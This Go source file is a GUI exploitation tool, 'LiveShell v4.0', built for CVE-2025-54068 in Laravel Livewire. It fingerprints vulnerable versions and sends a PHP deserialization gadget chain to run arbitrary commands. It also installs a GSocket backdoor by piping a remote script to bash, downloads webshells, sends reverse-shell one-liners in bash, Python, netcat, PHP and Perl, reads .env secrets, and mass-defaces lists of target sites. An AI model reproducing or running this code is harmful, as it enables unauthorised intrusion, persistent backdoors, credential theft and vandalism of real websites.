package main import ( "bytes" "crypto/tls" "encoding/base64" "encoding/json" "fmt" "html" "image/color" "io" "math/rand" "net/http" "net/http/cookiejar" "regexp" "strings" "sync" "time" "fyne.io/fyne/v2" "fyne.io/fyne/v2/app" "fyne.io/fyne/v2/canvas" "fyne.io/fyne/v2/container" "fyne.io/fyne/v2/dialog" "fyne.io/fyne/v2/theme" "fyne.io/fyne/v2/widget" ) // ==================== EXPLOIT CORE ==================== var livewireVersions = map[string]string{ "v3.0.0": "af0b760a", "v3.0.1": "11c49d7e", "v3.0.10": "2f6e5d4d", "v3.0.2": "51f84ddf", "v3.0.3": "75fdc007", "v3.0.4": "28cda9ab", "v3.0.5": "f41737f6", "v3.0.6": "5d3e67e0", "v3.0.7": "5d3e67e0", "v3.0.8": "178de384", "v3.0.9": "2f6e5d4d", "v3.1.0": "c4077c56", "v3.2.0": "d38cabc2", "v3.2.1": "2b77c128", "v3.2.2": "eaa5c323", "v3.2.3": "8afc12b0", "v3.2.4": "29c31048", "v3.2.5": "8a579aa1", "v3.2.6": "f477dd12", "v3.3.0": "8a199ab2", "v3.3.1": "f121a5df", "v3.3.2": "f121a5df", "v3.3.3": "f121a5df", "v3.3.4": "6c8cb814", "v3.3.5": "e2b302e9", "v3.4.0": "b713ce84", "v3.4.1": "5eee0fac", "v3.4.10": "239a5c52", "v3.4.11": "44144c23", "v3.4.12": "770f7738", "v3.4.2": "8ed4c109", "v3.4.3": "94b2c3e6", "v3.4.4": "a27c4ca2", "v3.4.5": "6b5eb707", "v3.4.6": "6b5eb707", "v3.4.7": "d02a3788", "v3.4.8": "4495682f", "v3.4.9": "5d8beb2e", "v3.5.0": "07f22875", "v3.5.1": "87e1046f", "v3.5.10": "ec3a716b", "v3.5.11": "36c381f7", "v3.5.12": "38dc8241", "v3.5.13": "4ce12f49", "v3.5.14": "0f65591d", "v3.5.15": "def850b5", "v3.5.16": "da3bb356", "v3.5.17": "02b08710", "v3.5.18": "951e6947", "v3.5.19": "13b7c601", "v3.5.2": "c4fc8c5d", "v3.5.20": "13b7c601", "v3.5.3": "7bfaddcd", "v3.5.4": "cc800bf4", "v3.5.5": "cc800bf4", "v3.5.6": "cc800bf4", "v3.5.7": "923613aa", "v3.5.8": "923613aa", "v3.5.9": "923613aa", "v3.6.0": "65f3e655", "v3.6.1": "65f3e655", "v3.6.2": "fcf8c2ad", "v3.6.3": "df3a17f2", } type LivewireExploit struct { client *http.Client targetURL string baseURL string updateURL string token string snapshot string param string version string user string hostname string pwd string idResult string connected bool } func NewExploit() *LivewireExploit { jar, _ := cookiejar.New(nil) return &LivewireExploit{ client: &http.Client{ Jar: jar, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, Timeout: 60 * time.Second, }, } } func (e *LivewireExploit) getCSRFToken(body string) string { if strings.Contains(body, `data-csrf="`) { parts := strings.SplitN(body, `data-csrf="`, 2) if len(parts) > 1 { return strings.SplitN(parts[1], `"`, 2)[0] } } if strings.Contains(body, "livewireScriptConfig") { re := regexp.MustCompile(`livewireScriptConfig\s*=\s*(\{[^;]+\})`) if m := re.FindStringSubmatch(body); len(m) > 1 { var config map[string]interface{} if err := json.Unmarshal([]byte(m[1]), &config); err == nil { if csrf, ok := config["csrf"].(string); ok { return csrf } } } } re := regexp.MustCompile(`]*name="csrf-token"[^>]*content="([^"]*)"`) if m := re.FindStringSubmatch(body); len(m) > 1 { return m[1] } return "" } func (e *LivewireExploit) getUpdateURI(body string) string { if strings.Contains(body, "livewireScriptConfig") { re := regexp.MustCompile(`livewireScriptConfig\s*=\s*(\{[^;]+\})`) if m := re.FindStringSubmatch(body); len(m) > 1 { var config map[string]interface{} if err := json.Unmarshal([]byte(m[1]), &config); err == nil { if uri, ok := config["uri"].(string); ok { return strings.TrimPrefix(uri, "/") } } } } if strings.Contains(body, `data-update-uri="`) { parts := strings.SplitN(body, `data-update-uri="`, 2) if len(parts) > 1 { uri := strings.SplitN(parts[1], `"`, 2)[0] return strings.TrimPrefix(uri, "/") } } return "" } func (e *LivewireExploit) checkVersion(body string) (bool, string) { bodyLower := strings.ToLower(body) for ver, hash := range livewireVersions { if strings.Contains(bodyLower, hash) { v := strings.TrimPrefix(ver, "v") return v < "3.6.4", ver } } return false, "" } func (e *LivewireExploit) extractSnapshots(body string) []string { re := regexp.MustCompile(`wire:snapshot="([^"]*)"`) matches := re.FindAllStringSubmatch(body, -1) var result []string for _, m := range matches { if len(m) > 1 { result = append(result, m[1]) } } return result } func (e *LivewireExploit) checkArrayParam(data map[string]interface{}) string { strict := map[string]bool{"str": true, "std": true, "int": true, "float": true, "mdl": true} for param, val := range data { if arr, ok := val.([]interface{}); ok { for _, entry := range arr { if m, ok := entry.(map[string]interface{}); ok { if sv, exists := m["s"]; exists { if !strict[fmt.Sprintf("%v", sv)] { return param } } } } } } return "" } func (e *LivewireExploit) Connect(targetURL string) error { e.targetURL = targetURL if !strings.HasPrefix(e.targetURL, "http://") && !strings.HasPrefix(e.targetURL, "https://") { e.targetURL = "https://" + e.targetURL } e.targetURL = strings.TrimSuffix(e.targetURL, "/") resp, err := e.client.Get(e.targetURL) if err != nil { return fmt.Errorf("Connection failed: %v", err) } defer resp.Body.Close() bodyBytes, _ := io.ReadAll(resp.Body) body := string(bodyBytes) e.baseURL = resp.Request.URL.Scheme + "://" + resp.Request.URL.Host + "/" if !strings.Contains(strings.ToLower(body), "livewire") { return fmt.Errorf("Target is not running Livewire") } isVuln, version := e.checkVersion(body) e.version = version if version != "" && !isVuln { return fmt.Errorf("Target is patched (>= 3.6.4)") } e.token = e.getCSRFToken(body) if e.token == "" { return fmt.Errorf("CSRF token not found") } updateURI := e.getUpdateURI(body) if updateURI == "" { return fmt.Errorf("Update URI not found") } if strings.HasPrefix(updateURI, "http") { e.updateURL = updateURI } else { e.updateURL = e.baseURL + updateURI } snapshots := e.extractSnapshots(body) if len(snapshots) == 0 { return fmt.Errorf("No snapshots found") } for _, snapRaw := range snapshots { snapStr := html.UnescapeString(snapRaw) var snapContent map[string]interface{} if err := json.Unmarshal([]byte(snapStr), &snapContent); err != nil { continue } data, ok := snapContent["data"].(map[string]interface{}) if !ok || len(data) == 0 { continue } if objParam := e.checkArrayParam(data); objParam != "" { e.snapshot = snapStr e.param = objParam break } for param := range data { e.snapshot = snapStr e.param = param break } } if e.snapshot == "" { return fmt.Errorf("No exploitable snapshot found") } e.connected = true e.idResult = e.Exec("id") if e.idResult == "" || !strings.Contains(e.idResult, "uid=") { e.connected = false return fmt.Errorf("RCE test failed") } e.user = strings.TrimSpace(e.Exec("whoami")) if e.user == "" { e.user = "www-data" } e.hostname = strings.TrimSpace(e.Exec("hostname")) if e.hostname == "" { e.hostname = "target" } e.pwd = strings.TrimSpace(e.Exec("pwd")) return nil } func (e *LivewireExploit) Exec(cmd string) string { if !e.connected && cmd != "id" { return "" } chained := fmt.Sprintf( "O:38:\"Illuminate\\Broadcasting\\BroadcastEvent\":4:{s:5:\"dummy\";O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"\x00*\x00events\";O:31:\"Illuminate\\Validation\\Validator\":1:{s:10:\"extensions\";a:1:{s:0:\"\";s:6:\"system\";}}s:8:\"\x00*\x00event\";s:%d:\"%s\";}s:10:\"connection\";N;s:5:\"queue\";N;s:5:\"event\";O:37:\"Illuminate\\Notifications\\Notification\":0:{}}", len(cmd), cmd, ) payload := map[string]interface{}{ "_token": e.token, "components": []interface{}{ map[string]interface{}{ "snapshot": e.snapshot, "updates": map[string]interface{}{ e.param: []interface{}{1, []interface{}{ map[string]interface{}{ "a": []interface{}{ map[string]interface{}{ "__toString": "phpversion", "close": []interface{}{ []interface{}{ []interface{}{ map[string]interface{}{"chained": []interface{}{chained}}, map[string]interface{}{"s": "form", "class": "Illuminate\\Broadcasting\\BroadcastEvent"}, }, "dispatchNextJobInChain", }, map[string]interface{}{"s": "clctn", "class": "Laravel\\SerializableClosure\\Serializers\\Signed"}, }, }, map[string]interface{}{"s": "clctn", "class": "GuzzleHttp\\Psr7\\FnStream"}, }, "b": []interface{}{ map[string]interface{}{ "__toString": []interface{}{ []interface{}{ []interface{}{nil, map[string]interface{}{"s": "mdl", "class": "Laravel\\Prompts\\Terminal"}}, "exit", }, map[string]interface{}{"s": "clctn", "class": "Laravel\\SerializableClosure\\Serializers\\Signed"}, }, }, map[string]interface{}{"s": "clctn", "class": "GuzzleHttp\\Psr7\\FnStream"}, }, }, map[string]interface{}{"class": "League\\Flysystem\\UrlGeneration\\ShardedPrefixPublicUrlGenerator", "s": "clctn"}, }}, }, "calls": []interface{}{}, }, }, } data, _ := json.Marshal(payload) req, _ := http.NewRequest("POST", e.updateURL, bytes.NewReader(data)) req.Header.Set("Content-Type", "application/json") req.Header.Set("Accept", "application/json") req.Header.Set("User-Agent", "Mozilla/5.0") resp, err := e.client.Do(req) if err != nil { return "" } defer resp.Body.Close() body, _ := io.ReadAll(resp.Body) text := string(body) if resp.StatusCode == 200 && !strings.Contains(text, `"snapshot"`) { return strings.TrimSpace(text) } return "" } // ==================== SAVED CONFIGS ==================== type SavedWebshell struct { Name string URL string } type SavedRevshell struct { Name string IP string Port string } var savedWebshells = []SavedWebshell{} var savedRevshells = []SavedRevshell{} // ==================== CATPPUCCIN MOCHA THEME ==================== type catppuccinTheme struct{} var ( cBase = color.RGBA{R: 0x1e, G: 0x1e, B: 0x2e, A: 0xff} cMantle = color.RGBA{R: 0x18, G: 0x18, B: 0x25, A: 0xff} cSurface0 = color.RGBA{R: 0x31, G: 0x32, B: 0x44, A: 0xff} cSurface1 = color.RGBA{R: 0x45, G: 0x47, B: 0x5a, A: 0xff} cSurface2 = color.RGBA{R: 0x58, G: 0x5b, B: 0x70, A: 0xff} cText = color.RGBA{R: 0xcd, G: 0xd6, B: 0xf4, A: 0xff} cSubtext0 = color.RGBA{R: 0xa6, G: 0xad, B: 0xc8, A: 0xff} cOverlay0 = color.RGBA{R: 0x6c, G: 0x70, B: 0x86, A: 0xff} cBlue = color.RGBA{R: 0x89, G: 0xb4, B: 0xfa, A: 0xff} cGreen = color.RGBA{R: 0xa6, G: 0xe3, B: 0xa1, A: 0xff} cRed = color.RGBA{R: 0xf3, G: 0x8b, B: 0xa8, A: 0xff} cPeach = color.RGBA{R: 0xfa, G: 0xb3, B: 0x87, A: 0xff} cMauve = color.RGBA{R: 0xcb, G: 0xa6, B: 0xf7, A: 0xff} cYellow = color.RGBA{R: 0xf9, G: 0xe2, B: 0xaf, A: 0xff} ) func (c *catppuccinTheme) Color(name fyne.ThemeColorName, variant fyne.ThemeVariant) color.Color { switch name { case theme.ColorNameBackground: return cBase case theme.ColorNameButton: return cSurface1 case theme.ColorNameDisabledButton: return cSurface0 case theme.ColorNameDisabled: return cOverlay0 case theme.ColorNameError: return cRed case theme.ColorNameFocus: return cBlue case theme.ColorNameForeground: return cText case theme.ColorNameHover: return cSurface2 case theme.ColorNameInputBackground: return cSurface0 case theme.ColorNameInputBorder: return cSurface2 case theme.ColorNameMenuBackground: return cMantle case theme.ColorNameOverlayBackground: return cMantle case theme.ColorNamePlaceHolder: return cOverlay0 case theme.ColorNamePressed: return cSurface2 case theme.ColorNamePrimary: return cBlue case theme.ColorNameScrollBar: return cSurface2 case theme.ColorNameSelection: return cSurface1 case theme.ColorNameSeparator: return cSurface1 case theme.ColorNameShadow: return color.RGBA{R: 0x11, G: 0x11, B: 0x1b, A: 0xaa} case theme.ColorNameSuccess: return cGreen case theme.ColorNameWarning: return cYellow default: return theme.DefaultTheme().Color(name, variant) } } func (c *catppuccinTheme) Font(style fyne.TextStyle) fyne.Resource { return theme.DefaultTheme().Font(style) } func (c *catppuccinTheme) Icon(name fyne.ThemeIconName) fyne.Resource { return theme.DefaultTheme().Icon(name) } func (c *catppuccinTheme) Size(name fyne.ThemeSizeName) float32 { return theme.DefaultTheme().Size(name) } // ==================== OPTIMIZED LOGGER (ANTI-LAG) ==================== type OptimizedLogger struct { output *widget.Entry lines []string maxLines int mu sync.Mutex } func NewOptimizedLogger(output *widget.Entry) *OptimizedLogger { return &OptimizedLogger{ output: output, lines: []string{}, maxLines: 300, // Limit lines to prevent lag } } func (l *OptimizedLogger) Log(msg string) { l.mu.Lock() defer l.mu.Unlock() l.lines = append(l.lines, msg) // Remove old lines if exceeded if len(l.lines) > l.maxLines { l.lines = l.lines[len(l.lines)-l.maxLines:] } l.output.SetText(strings.Join(l.lines, "\n")) l.output.CursorRow = len(l.lines) - 1 } func (l *OptimizedLogger) LogSuccess(msg string) { l.Log("✅ " + msg) } func (l *OptimizedLogger) LogError(msg string) { l.Log("❌ " + msg) } func (l *OptimizedLogger) LogWarning(msg string) { l.Log("⚠️ " + msg) } func (l *OptimizedLogger) LogInfo(msg string) { l.Log("ℹ️ " + msg) } func (l *OptimizedLogger) Clear() { l.mu.Lock() defer l.mu.Unlock() l.lines = []string{} l.output.SetText("") } // ==================== GUI APPLICATION ==================== type LiveShellGUI struct { app fyne.App window fyne.Window exploit *LivewireExploit logger *OptimizedLogger logOutput *widget.Entry cmdInput *widget.Entry statusLbl *widget.Label targetLbl *widget.Label userLbl *widget.Label versionLbl *widget.Label // Mass Deface defaceRunning bool defaceAbort bool } func NewGUI() *LiveShellGUI { a := app.NewWithID("com.liveshell.v4") a.Settings().SetTheme(&catppuccinTheme{}) return &LiveShellGUI{ app: a, exploit: NewExploit(), } } func (g *LiveShellGUI) updateStatus(connected bool) { if connected { g.statusLbl.SetText("● CONNECTED") g.targetLbl.SetText("Target: " + g.exploit.targetURL) g.userLbl.SetText("User: " + g.exploit.user + "@" + g.exploit.hostname) if g.exploit.version != "" { g.versionLbl.SetText("Version: " + g.exploit.version + " [VULN]") } else { g.versionLbl.SetText("Version: Unknown [VULN]") } } else { g.statusLbl.SetText("○ DISCONNECTED") g.targetLbl.SetText("Target: -") g.userLbl.SetText("User: -") g.versionLbl.SetText("Version: -") } } // ==================== GSOCKET DIALOG (FIXED) ==================== func (g *LiveShellGUI) showGsocketDialog() { if !g.exploit.connected { dialog.ShowError(fmt.Errorf("Not connected"), g.window) return } content := widget.NewLabel("This will install GSocket backdoor.\n\nCommand: curl https://localroot.sbs/cat.sh | bash\n\nThe connect command will be shown after installation.") dialog.ShowCustomConfirm("🌐 Install GSocket", "Install", "Cancel", content, func(ok bool) { if !ok { return } go func() { g.logger.Log("═══════════════════════════════════════") g.logger.Log("🌐 INSTALLING GSOCKET BACKDOOR") g.logger.Log("═══════════════════════════════════════") g.logger.Log("") g.logger.Log("$ curl https://localroot.sbs/cat.sh | bash") g.logger.Log("") g.logger.Log("⏳ Please wait...") g.logger.Log("") // Execute the correct command output := g.exploit.Exec("curl -fsSL https://localroot.sbs/cat.sh 2>/dev/null | bash 2>&1") if output != "" { // Log output line by line lines := strings.Split(output, "\n") for _, line := range lines { if line != "" { g.logger.Log(line) } } // Extract gs-netcat connect command re := regexp.MustCompile(`gs-netcat\s+-s\s+"([^"]+)"\s+-i`) if m := re.FindStringSubmatch(output); len(m) > 1 { g.logger.Log("") g.logger.Log("═══════════════════════════════════════") g.logger.LogSuccess("GSOCKET INSTALLED!") g.logger.Log("═══════════════════════════════════════") g.logger.Log("") g.logger.Log("📌 Connect command:") g.logger.Log(" gs-netcat -s \"" + m[1] + "\" -i") g.logger.Log("") } } else { g.logger.LogError("No output - check if curl is available") } }() }, g.window) } // ==================== WEBSHELL DIALOG (WITH SAVE) ==================== func (g *LiveShellGUI) showWebshellDialog() { if !g.exploit.connected { dialog.ShowError(fmt.Errorf("Not connected"), g.window) return } // Saved webshells list var savedNames []string savedNames = append(savedNames, "-- New --") for _, ws := range savedWebshells { savedNames = append(savedNames, ws.Name+" ("+ws.URL+")") } savedSelect := widget.NewSelect(savedNames, nil) savedSelect.SetSelected("-- New --") nameEntry := widget.NewEntry() nameEntry.SetPlaceHolder("Name (to save)") urlEntry := widget.NewEntry() urlEntry.SetPlaceHolder("https://target.com/shell.php") shellType := widget.NewSelect([]string{ "Simple Shell ()", "Alfa Shell (GitHub)", "Custom URL", }, nil) shellType.SetSelected("Simple Shell ()") filenameEntry := widget.NewEntry() filenameEntry.SetText("1337.php") savedSelect.OnChanged = func(s string) { for _, ws := range savedWebshells { if strings.HasPrefix(s, ws.Name) { urlEntry.SetText(ws.URL) break } } } content := container.NewVBox( widget.NewLabel("💾 Saved Webshells:"), savedSelect, widget.NewSeparator(), widget.NewLabel("📝 Save Name (optional):"), nameEntry, widget.NewLabel("🐚 Shell Type:"), shellType, widget.NewLabel("📄 Filename:"), filenameEntry, widget.NewLabel("🔗 Custom URL (if Custom):"), urlEntry, ) dialog.ShowCustomConfirm("🐚 WebShell Upload", "Upload", "Cancel", content, func(ok bool) { if !ok { return } filename := filenameEntry.Text if filename == "" { filename = "1337.php" } // Save if name provided if nameEntry.Text != "" && urlEntry.Text != "" { savedWebshells = append(savedWebshells, SavedWebshell{ Name: nameEntry.Text, URL: urlEntry.Text, }) g.logger.LogSuccess("Saved webshell: " + nameEntry.Text) } go func() { g.logger.Log("═══════════════════════════════════════") g.logger.Log("🐚 UPLOADING WEBSHELL") g.logger.Log("═══════════════════════════════════════") selected := shellType.Selected var cmd string if strings.Contains(selected, "Simple") { shell := `` encoded := base64.StdEncoding.EncodeToString([]byte(shell)) cmd = fmt.Sprintf("echo '%s' | base64 -d > '%s'", encoded, filename) g.logger.Log("📦 Type: Simple Shell") } else if strings.Contains(selected, "Alfa") { cmd = fmt.Sprintf("curl -fsSL 'https://raw.githubusercontent.com/pengodehandal/botakgeng/refs/heads/main/Alfa-modified.php' -o '%s'", filename) g.logger.Log("📦 Type: Alfa Shell") } else { if urlEntry.Text == "" { g.logger.LogError("Custom URL is empty!") return } cmd = fmt.Sprintf("curl -fsSL '%s' -o '%s'", urlEntry.Text, filename) g.logger.Log("📦 Type: Custom URL") } g.logger.Log("📄 Filename: " + filename) g.logger.Log("") g.logger.Log("⏳ Uploading...") g.exploit.Exec(cmd) // Verify with ls time.Sleep(500 * time.Millisecond) lsOutput := g.exploit.Exec("ls -la " + filename + " 2>&1") if strings.Contains(lsOutput, filename) && !strings.Contains(lsOutput, "No such file") { g.logger.Log("") g.logger.LogSuccess("UPLOAD SUCCESS!") g.logger.Log("📋 " + lsOutput) g.logger.Log("🔗 URL: " + g.exploit.baseURL + filename + "?cmd=id") } else { g.logger.Log("") g.logger.LogError("UPLOAD FAILED!") g.logger.Log("📋 " + lsOutput) } }() }, g.window) } // ==================== REVSHELL DIALOG (WITH SAVE) ==================== func (g *LiveShellGUI) showRevshellDialog() { if !g.exploit.connected { dialog.ShowError(fmt.Errorf("Not connected"), g.window) return } // Saved revshells list var savedNames []string savedNames = append(savedNames, "-- New --") for _, rs := range savedRevshells { savedNames = append(savedNames, fmt.Sprintf("%s (%s:%s)", rs.Name, rs.IP, rs.Port)) } savedSelect := widget.NewSelect(savedNames, nil) savedSelect.SetSelected("-- New --") nameEntry := widget.NewEntry() nameEntry.SetPlaceHolder("Name (to save)") ipEntry := widget.NewEntry() ipEntry.SetPlaceHolder("Your IP") portEntry := widget.NewEntry() portEntry.SetText("4444") shellType := widget.NewSelect([]string{ "Bash TCP", "Python3", "Netcat FIFO", "PHP", "Perl", }, nil) shellType.SetSelected("Bash TCP") savedSelect.OnChanged = func(s string) { for _, rs := range savedRevshells { if strings.HasPrefix(s, rs.Name) { ipEntry.SetText(rs.IP) portEntry.SetText(rs.Port) break } } } content := container.NewVBox( widget.NewLabel("💾 Saved Configs:"), savedSelect, widget.NewSeparator(), widget.NewLabel("📝 Save Name (optional):"), nameEntry, widget.NewLabel("🌐 Your IP:"), ipEntry, widget.NewLabel("🔌 Port:"), portEntry, widget.NewLabel("🐚 Shell Type:"), shellType, ) dialog.ShowCustomConfirm("🔌 Reverse Shell", "Send", "Cancel", content, func(ok bool) { if !ok { return } ip := ipEntry.Text port := portEntry.Text if ip == "" || port == "" { return } // Save if name provided if nameEntry.Text != "" { savedRevshells = append(savedRevshells, SavedRevshell{ Name: nameEntry.Text, IP: ip, Port: port, }) g.logger.LogSuccess("Saved config: " + nameEntry.Text) } var payload string selected := shellType.Selected switch selected { case "Bash TCP": payload = fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1' &", ip, port) case "Python3": payload = fmt.Sprintf(`python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("%s",%s));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' &`, ip, port) case "Netcat FIFO": payload = fmt.Sprintf("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f &", ip, port) case "PHP": payload = fmt.Sprintf(`php -r '$sock=fsockopen("%s",%s);exec("/bin/sh -i <&3 >&3 2>&3");' &`, ip, port) case "Perl": payload = fmt.Sprintf(`perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");' &`, ip, port) } go func() { g.logger.Log("═══════════════════════════════════════") g.logger.Log("🔌 SENDING REVERSE SHELL") g.logger.Log("═══════════════════════════════════════") g.logger.Log("🎯 Target: " + ip + ":" + port) g.logger.Log("🐚 Type: " + selected) g.logger.Log("") g.logger.Log("💻 Start listener: nc -lvnp " + port) g.logger.Log("") g.logger.Log("⏳ Sending payload...") g.exploit.Exec(payload) g.logger.Log("") g.logger.LogSuccess("Payload sent! Check your listener.") }() }, g.window) } // ==================== MASS DEFACE DIALOG ==================== func (g *LiveShellGUI) showMassDefaceDialog() { if !g.exploit.connected { dialog.ShowError(fmt.Errorf("Not connected"), g.window) return } targetsEntry := widget.NewMultiLineEntry() targetsEntry.SetPlaceHolder("https://target1.com\nhttps://target2.com\nhttps://target3.com") targetsEntry.SetMinRowsVisible(5) filenameEntry := widget.NewEntry() filenameEntry.SetText("pwned.php") contentEntry := widget.NewMultiLineEntry() contentEntry.SetPlaceHolder("Deface content...") contentEntry.SetMinRowsVisible(5) // Template buttons htmlBtn := widget.NewButton("HTML", func() { contentEntry.SetText(`Hacked

HACKED!

By: Astar1337 x Bboscat x Heru1337

`) }) phpBtn := widget.NewButton("PHP Shell", func() { contentEntry.SetText(``) }) txtBtn := widget.NewButton("Text", func() { contentEntry.SetText(`HACKED BY ASTAR1337 x BBOSCAT x HERU1337`) }) templateRow := container.NewHBox(htmlBtn, phpBtn, txtBtn) content := container.NewVBox( widget.NewLabel("🎯 Target URLs (one per line):"), targetsEntry, widget.NewLabel("📄 Filename:"), filenameEntry, widget.NewLabel("📝 Templates:"), templateRow, widget.NewLabel("📝 Content:"), contentEntry, ) dialog.ShowCustomConfirm("🔥 Mass Deface", "Start", "Cancel", content, func(ok bool) { if !ok { return } targets := strings.Split(targetsEntry.Text, "\n") filename := filenameEntry.Text defaceContent := contentEntry.Text if len(targets) == 0 || filename == "" || defaceContent == "" { return } go g.runMassDeface(targets, filename, defaceContent) }, g.window) } func (g *LiveShellGUI) runMassDeface(targets []string, filename, content string) { g.defaceRunning = true g.defaceAbort = false success := 0 failed := 0 g.logger.Log("═══════════════════════════════════════") g.logger.Log("🔥 MASS DEFACE STARTED") g.logger.Log("═══════════════════════════════════════") g.logger.Log(fmt.Sprintf("📊 Targets: %d", len(targets))) g.logger.Log(fmt.Sprintf("📄 Filename: %s", filename)) g.logger.Log("") for i, target := range targets { if g.defaceAbort { g.logger.LogWarning("Aborted!") break } target = strings.TrimSpace(target) if target == "" { continue } g.logger.Log(fmt.Sprintf("[%d/%d] %s", i+1, len(targets), target)) // Create new exploit for this target exploit := NewExploit() err := exploit.Connect(target) if err != nil { failed++ g.logger.LogError("FAILED: " + err.Error()) continue } // Get pwd and create file pwd := strings.TrimSpace(exploit.Exec("pwd")) filePath := pwd + "/" + filename // Escape content and write escapedContent := strings.ReplaceAll(content, "'", "'\\''") cmd := fmt.Sprintf("echo '%s' > '%s'", escapedContent, filePath) exploit.Exec(cmd) // Verify with ls lsOutput := exploit.Exec("ls -la '" + filePath + "' 2>&1") if strings.Contains(lsOutput, filename) && !strings.Contains(lsOutput, "No such file") { success++ g.logger.LogSuccess("SUCCESS: " + filePath) } else { failed++ g.logger.LogError("FAILED: File not created") } } g.logger.Log("") g.logger.Log("═══════════════════════════════════════") g.logger.Log("🔥 MASS DEFACE COMPLETE") g.logger.Log("═══════════════════════════════════════") g.logger.Log(fmt.Sprintf("✅ Success: %d", success)) g.logger.Log(fmt.Sprintf("❌ Failed: %d", failed)) g.defaceRunning = false } func (g *LiveShellGUI) createMainUI() fyne.CanvasObject { // Header title := canvas.NewText("⚡ LIVESHELL v4.0 ⚡", cBlue) title.TextSize = 26 title.TextStyle = fyne.TextStyle{Bold: true} title.Alignment = fyne.TextAlignCenter subtitle := canvas.NewText("CVE-2025-54068 | Mass Deface Edition", cSubtext0) subtitle.TextSize = 12 subtitle.Alignment = fyne.TextAlignCenter credits := canvas.NewText("By: Astar1337 • Bboscat • Heru1337", cMauve) credits.TextSize = 11 credits.Alignment = fyne.TextAlignCenter header := container.NewVBox(title, subtitle, credits, widget.NewSeparator()) // Status Panel g.statusLbl = widget.NewLabel("○ DISCONNECTED") g.targetLbl = widget.NewLabel("Target: -") g.userLbl = widget.NewLabel("User: -") g.versionLbl = widget.NewLabel("Version: -") statusCard := widget.NewCard("📡 Status", "", container.NewVBox( g.statusLbl, g.targetLbl, g.userLbl, g.versionLbl, )) // Target Input targetEntry := widget.NewEntry() targetEntry.SetPlaceHolder("https://target.com") connectBtn := widget.NewButton("🔗 Connect", func() { target := targetEntry.Text if target == "" { dialog.ShowError(fmt.Errorf("Enter target URL"), g.window) return } g.exploit = NewExploit() go func() { g.logger.Log("═══════════════════════════════════════") g.logger.Log("🎯 Connecting to: " + target) g.logger.Log("═══════════════════════════════════════") err := g.exploit.Connect(target) if err != nil { g.logger.LogError(err.Error()) g.updateStatus(false) return } g.logger.LogSuccess("Connected!") g.logger.Log("📌 Version: " + g.exploit.version) g.logger.Log("👤 User: " + g.exploit.user + "@" + g.exploit.hostname) g.logger.Log("📁 PWD: " + g.exploit.pwd) g.logger.Log("🔓 " + g.exploit.idResult) g.updateStatus(true) }() }) connectBtn.Importance = widget.HighImportance targetCard := widget.NewCard("🎯 Target", "", container.NewBorder(nil, nil, nil, connectBtn, targetEntry)) // Command Input g.cmdInput = widget.NewEntry() g.cmdInput.SetPlaceHolder("Enter command...") execBtn := widget.NewButton("▶ Run", func() { cmd := g.cmdInput.Text if cmd == "" || !g.exploit.connected { return } g.cmdInput.SetText("") go func() { g.logger.Log("$ " + cmd) output := g.exploit.Exec(cmd) if output != "" { g.logger.Log(output) } }() }) execBtn.Importance = widget.HighImportance g.cmdInput.OnSubmitted = func(s string) { execBtn.OnTapped() } cmdCard := widget.NewCard("💻 Command", "", container.NewBorder(nil, nil, nil, execBtn, g.cmdInput)) // Quick Commands quickBtns := container.NewGridWithColumns(4, widget.NewButton("id", func() { g.quickCmd("id") }), widget.NewButton("whoami", func() { g.quickCmd("whoami") }), widget.NewButton("pwd", func() { g.quickCmd("pwd") }), widget.NewButton("ls -la", func() { g.quickCmd("ls -la") }), widget.NewButton("uname -a", func() { g.quickCmd("uname -a") }), widget.NewButton("cat .env", func() { g.quickCmd("cat .env 2>/dev/null || cat ../.env 2>/dev/null") }), widget.NewButton("ps aux", func() { g.quickCmd("ps aux | head -20") }), widget.NewButton("netstat", func() { g.quickCmd("netstat -tulpn 2>/dev/null | head -15") }), ) // Backdoor Actions backdoorBtns := container.NewGridWithColumns(3, widget.NewButton("🌐 GSocket", func() { g.showGsocketDialog() }), widget.NewButton("🐚 WebShell", func() { g.showWebshellDialog() }), widget.NewButton("🔌 RevShell", func() { g.showRevshellDialog() }), ) // Mass Deface Button massDefaceBtn := widget.NewButton("🔥 MASS DEFACE", func() { g.showMassDefaceDialog() }) massDefaceBtn.Importance = widget.DangerImportance actionsCard := widget.NewCard("⚡ Actions", "", container.NewVBox( widget.NewLabel("Quick Commands"), quickBtns, widget.NewSeparator(), widget.NewLabel("Backdoors"), backdoorBtns, widget.NewSeparator(), massDefaceBtn, )) // Output Log g.logOutput = widget.NewMultiLineEntry() g.logOutput.SetPlaceHolder("Output will appear here...\n\nConnect to a target to start! 🔥") g.logOutput.Wrapping = fyne.TextWrapWord g.logOutput.SetMinRowsVisible(20) g.logger = NewOptimizedLogger(g.logOutput) clearBtn := widget.NewButton("🗑️ Clear", func() { g.logger.Clear() }) logCard := widget.NewCard("📜 Output", "", container.NewBorder(nil, clearBtn, nil, nil, g.logOutput)) // Layout leftPanel := container.NewVBox(statusCard, targetCard, cmdCard, actionsCard) rightPanel := logCard content := container.NewHSplit(leftPanel, rightPanel) content.SetOffset(0.42) // Footer footer := canvas.NewText("LiveShell v4.0 | Educational purposes only", cOverlay0) footer.TextSize = 10 footer.Alignment = fyne.TextAlignCenter return container.NewBorder(header, footer, nil, nil, content) } func (g *LiveShellGUI) quickCmd(cmd string) { if !g.exploit.connected { return } go func() { g.logger.Log("$ " + cmd) output := g.exploit.Exec(cmd) if output != "" { g.logger.Log(output) } }() } func (g *LiveShellGUI) Run() { g.window = g.app.NewWindow("LiveShell v4.0 - CVE-2025-54068") g.window.SetContent(g.createMainUI()) g.window.Resize(fyne.NewSize(1280, 780)) g.window.CenterOnScreen() g.window.ShowAndRun() } func main() { rand.Seed(time.Now().UnixNano()) gui := NewGUI() gui.Run() }